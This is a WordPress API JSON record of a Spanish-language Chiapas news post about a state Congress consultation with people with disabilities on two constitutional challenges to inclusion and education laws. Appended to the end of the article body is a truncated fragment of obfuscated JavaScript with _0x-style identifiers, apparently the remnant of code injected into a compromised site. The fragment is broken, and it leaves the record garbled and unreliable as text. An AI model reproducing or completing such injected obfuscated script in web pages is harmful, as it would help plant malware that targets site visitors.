{"id":8849,"date":"2023-02-27T01:50:10","date_gmt":"2023-02-27T01:50:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8849"},"modified":"2023-02-27T01:50:10","modified_gmt":"2023-02-27T01:50:10","slug":"congreso-del-estado-realiza-consulta-relativa-a-las-acciones-de-inconstitucionalidad-297-2020-ley-para-la-inclusion-de-las-personas-con-discapacidad-291-2020-ley-de-educacion-capitulo-xvi-de-la","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8849","title":{"rendered":"Congreso del Estado realiza consulta relativa a las Acciones de Inconstitucionalidad 297\/2020 Ley para la Inclusi\u00f3n de las Personas con Discapacidad 291\/2020 Ley de Educaci\u00f3n, capitulo XVI de la \u201cEducaci\u00f3n Inclusiva y Educaci\u00f3n especial\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230226-WA0027-1.jpg\" alt=\"\" class=\"wp-image-8850\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230226-WA0027-1.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230226-WA0027-1-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230226-WA0027-1-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/IMG-20230226-WA0027-1-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez Chiapas a 26 de febrero de 2023.- Con el objetivo de impulsar acciones para identificar, prevenir y reducir cualquier forma de discriminaci\u00f3n, el Congreso del Estado llev\u00f3 a cabo la Consulta a Personas con Discapacidad y Organizaciones que las representen respecto a las Acciones de Inconstitucionalidad n\u00famero 297\/2020 relativa a la Ley para la Inclusi\u00f3n de las Personas con Discapacidad y n\u00famero 291\/2020 de la Ley de Educaci\u00f3n, en su capitulo XVI \u201cDe la Educaci\u00f3n Inclusiva y Educaci\u00f3n Especial\u201d, ambas del Estado Libre y Soberano de Chiapas.En el encuentro ciudadano para atender la Acci\u00f3n de Inconstitucionalidad 297\/2020, coordinado por la diputada Flor de Mar\u00eda Esponda Torres, Secretaria de la Comisi\u00f3n de Atenci\u00f3n a Grupos Vulnerables, que preside la diputada Paola Villamonte P\u00e9rez, se explicaron los alcances de la Ley para la Inclusi\u00f3n de las Personas con Discapacidad, en materia de Inclusi\u00f3n social, contenidas en la citada Ley.Correspondi\u00f3 a la diputada Cecilia L\u00f3pez S\u00e1nchez dar a conocer las conclusiones de dicha Consulta, en donde qued\u00f3 plasmado el sentir a favor de los art\u00edculos en discusi\u00f3n, por parte de las diversas Organizaciones que participaron en las encuestas.Al t\u00e9rmino del primer proceso de consulta, se llev\u00f3 a cabo la Consulta en materia de Educaci\u00f3n Especial y Educaci\u00f3n Inclusiva, contenida en la Acci\u00f3n de Inconstitucionalidad n\u00famero 291\/2020, resuelta por la Suprema Corte de Justicia de la Naci\u00f3n, cuyos trabajos fueron coordinados por la Diputada Mar\u00eda Reyes Diego G\u00f3mez, Presidenta de la Comisi\u00f3n de Educaci\u00f3n y Cultura.Correspondi\u00f3 al diputado Marcelo Toledo Cruz dar a conocer las conclusiones de los trabajos realizados, los cuales quedaron plasmados en el acta correspondiente.Participaron en el proceso de consulta las y los diputados: Sonia Catalina \u00c1lvarez en su calidad de presidente de la Mesa Directiva del Congreso del Estado; Elizabeth Escobedo Morales y Felipe Granda Pastrana; as\u00ed como organizaciones civiles, activistas en la materia, instituciones relacionadas con el tema y grupos civiles.En la Consulta estuvieron presentes Karla Patricia Fragoso, del Sistema DIF Chiapas; Lucina Trejo Vel\u00e1zquez de la Secretar\u00eda de Educaci\u00f3n; Edelmira Luz Mar\u00edn Zenteno en representaci\u00f3n de la titular del Consejo Consultivo Ciudadano del Sistema DIF Chiapas; Nancy Moguel Salgado visitadora adjunta de la Comisi\u00f3n Estatal de Derechos Humanos; y Mar\u00eda Sumiko Aguirre Fisher Directora CRIT Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez Chiapas a 26 de febrero de 2023.- Con el objetivo de impulsar acciones para identificar, prevenir y reducir cualquier forma de discriminaci\u00f3n, el Congreso del Estado llev\u00f3 a cabo la Consulta a Personas con Discapacidad y Organizaciones que las representen respecto a las Acciones de Inconstitucionalidad n\u00famero 297\/2020 relativa a la Ley para &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8850,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-8849","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8849","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8849"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8849\/revisions"}],"predecessor-version":[{"id":8851,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8849\/revisions\/8851"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8850"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}